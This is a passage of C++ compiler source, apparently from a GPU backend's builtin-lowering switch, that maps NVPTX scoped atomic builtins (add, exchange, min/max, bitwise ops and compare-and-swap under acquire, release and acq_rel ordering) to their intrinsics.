case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_release_add_gen_i:
case NVPTX::BI__nvvm_atom_release_add_gen_l:
case NVPTX::BI__nvvm_atom_release_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_release);
case NVPTX::BI__nvvm_atom_release_add_gen_f:
case NVPTX::BI__nvvm_atom_release_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_release);
case NVPTX::BI__nvvm_atom_release_xchg_gen_i:
case NVPTX::BI__nvvm_atom_release_xchg_gen_l:
case NVPTX::BI__nvvm_atom_release_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_release);
case NVPTX::BI__nvvm_atom_release_max_gen_i:
case NVPTX::BI__nvvm_atom_release_max_gen_l:
case NVPTX::BI__nvvm_atom_release_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_release);
case NVPTX::BI__nvvm_atom_release_max_gen_ui:
case NVPTX::BI__nvvm_atom_release_max_gen_ul:
case NVPTX::BI__nvvm_atom_release_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_release);
case NVPTX::BI__nvvm_atom_release_min_gen_i:
case NVPTX::BI__nvvm_atom_release_min_gen_l:
case NVPTX::BI__nvvm_atom_release_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_release);
case NVPTX::BI__nvvm_atom_release_min_gen_ui:
case NVPTX::BI__nvvm_atom_release_min_gen_ul:
case NVPTX::BI__nvvm_atom_release_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_release);
case NVPTX::BI__nvvm_atom_release_inc_gen_ui:
case NVPTX::BI__nvvm_atom_release_inc_gen_ul:
case NVPTX::BI__nvvm_atom_release_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_release);
case NVPTX::BI__nvvm_atom_release_dec_gen_ui:
case NVPTX::BI__nvvm_atom_release_dec_gen_ul:
case NVPTX::BI__nvvm_atom_release_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_release);
case NVPTX::BI__nvvm_atom_release_and_gen_i:
case NVPTX::BI__nvvm_atom_release_and_gen_l:
case NVPTX::BI__nvvm_atom_release_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_release);
case NVPTX::BI__nvvm_atom_release_or_gen_i:
case NVPTX::BI__nvvm_atom_release_or_gen_l:
case NVPTX::BI__nvvm_atom_release_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_release);
case NVPTX::BI__nvvm_atom_release_xor_gen_i:
case NVPTX::BI__nvvm_atom_release_xor_gen_l:
case NVPTX::BI__nvvm_atom_release_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_release);
case NVPTX::BI__nvvm_atom_release_cas_gen_i:
case NVPTX::BI__nvvm_atom_release_cas_gen_l:
case NVPTX::BI__nvvm_atom_release_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_release);
case NVPTX::BI__nvvm_atom_release_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_release_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_release_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_f:
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_and_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_and_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_or_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_or_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xor_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_xor_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cas_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cas_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_add_global_i:
case NVPTX::BI__nvvm_atom_add_global_l:
case NVPTX::BI__nvvm_atom_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i);
case NVPTX::BI__nvvm_atom_add_global_f:
case NVPTX::BI__nvvm_atom_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f);
case NVPTX::BI__nvvm_atom_xchg_global_i:
case NVPTX::BI__nvvm_atom_xchg_global_l:
case NVPTX::BI__nvvm_atom_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i);
case NVPTX::BI__nvvm_atom_max_global_i:
case NVPTX::BI__nvvm_atom_max_global_l:
case NVPTX::BI__nvvm_atom_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i);
case NVPTX::BI__nvvm_atom_max_global_ui:
case NVPTX::BI__nvvm_atom_max_global_ul:
case NVPTX::BI__nvvm_atom_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui);
case NVPTX::BI__nvvm_atom_min_global_i:
case NVPTX::BI__nvvm_atom_min_global_l:
case NVPTX::BI__nvvm_atom_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i);
case NVPTX::BI__nvvm_atom_min_global_ui:
case NVPTX::BI__nvvm_atom_min_global_ul:
case NVPTX::BI__nvvm_atom_min_global_ull:
